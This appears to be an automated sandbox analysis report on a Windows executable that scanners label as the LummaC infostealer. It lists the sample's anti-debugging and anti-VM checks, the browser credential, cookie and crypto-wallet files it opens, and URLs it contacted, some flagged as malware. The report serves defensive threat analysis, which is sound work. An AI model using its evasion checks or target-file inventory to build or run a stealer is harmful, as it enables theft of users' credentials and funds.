                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0BBF second address: 52F0BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0C26 second address: 52F0C2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Special instruction interceptor: First address: B8FA21 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Special instruction interceptor: First address: C0A63B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe TID: 520 Thread sleep time: -270000s >= -30000s
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe TID: 520 Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: 4KDKJjRzm8.exe, 4KDKJjRzm8.exe, 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1613444081.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614536555.00000000012C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1610641364.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513399465.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539387547.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1543528478.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1565220310.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1613613036.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488231577.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614720928.000000000131E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: 4KDKJjRzm8.exe, 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe File opened: NTICE
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe File opened: SICE
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Code function: 0_2_009BE110 LdrInitializeThunk,0_2_009BE110

                HIPS / PFW / Operating System Protection Evasion

                Source: 4KDKJjRzm8.exe Binary or memory string: o7Program Manager
                Source: 4KDKJjRzm8.exe, 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: o7Program Manager
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1565220310.000000000131E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1565309257.0000000005C24000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match File source: Process Memory Space: 4KDKJjRzm8.exe PID: 1460, type: MEMORYSTR
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1610641364.000000000131E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1610641364.000000000131E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/JAXX New Version["site
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1610641364.000000000131E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.walletpX
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.json
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, Directory queried: C:\Users\user\Documents\UOOJJOZIRH
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, Directory queried: C:\Users\user\Documents\AIXACVYBSB
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, Directory queried: C:\Users\user\Documents\JSDNGYCOWY
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe, Directory queried: C:\Users\user\Documents\TQDGENUHWP
                Source: Yara match, File source: Process Memory Space: 4KDKJjRzm8.exe PID: 1460, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match, File source: Process Memory Space: 4KDKJjRzm8.exe PID: 1460, type: MEMORYSTR
                Source: Yara match, File source: sslproxydump.pcap, type: PCAP
                Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 44 Virtualization/Sandbox Evasion | 1 OS Credential Dumping | 851 Security Software Discovery | Remote Services | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 44 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 31 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 223 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

                Source | Detection | Scanner | Label
                4KDKJjRzm8.exe | 63% | ReversingLabs | Win32.Exploit.LummaC
                4KDKJjRzm8.exe | 100% | Avira | TR/Crypt.XPACK.Gen
                4KDKJjRzm8.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                                                                          https://www.gstatic.cn/recaptcha/4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://lev-tolstoi.com/pitT4KDKJjRzm8.exe, 00000000.00000003.1613301096.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmptrue
                                                                            • Avira URL Cloud: malware
                                                                            unknown
                                                                            https://lev-tolstoi.com/qo4KDKJjRzm8.exe, 00000000.00000003.1613301096.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            unknown
                                                                            http://www.valvesoftware.com/legal.htm4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=en4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.youtube.com4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.google.com4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://lev-tolstoi.com/pi44KDKJjRzm8.exe, 00000000.00000003.1543231877.000000000136F000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1542773608.000000000136D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1565125707.000000000136D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://lev-tolstoi.com/pi04KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://lev-tolstoi.com/api)4KDKJjRzm8.exe, 00000000.00000003.1539387547.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1543528478.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488231577.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513371568.000000000132D000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://lev-tolstoi.com/iaj4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001361000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1613301096.0000000001366000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001366000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af64KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta4KDKJjRzm8.exe, 00000000.00000003.1541193562.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1565070208.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1540810685.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1542630820.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1516290444.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539246157.0000000005CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://community.fastly.steamstatic.com/public/images/s4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://lev-tolstoi.com/piD4KDKJjRzm8.exe, 00000000.00000003.1488959320.0000000001360000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488193272.000000000135F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                              • Avira URL Cloud: malware
                                                                                              unknown
                                                                                              https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://s.ytimg.com;4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=14KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://community.fastly.steamstatic.com/4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488231577.000000000131E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://steam.tv/4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=en4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://lev-tolstoi.com/ARE4KDKJjRzm8.exe, 00000000.00000003.1488959320.0000000001360000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1515928263.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488193272.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513284186.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  unknown
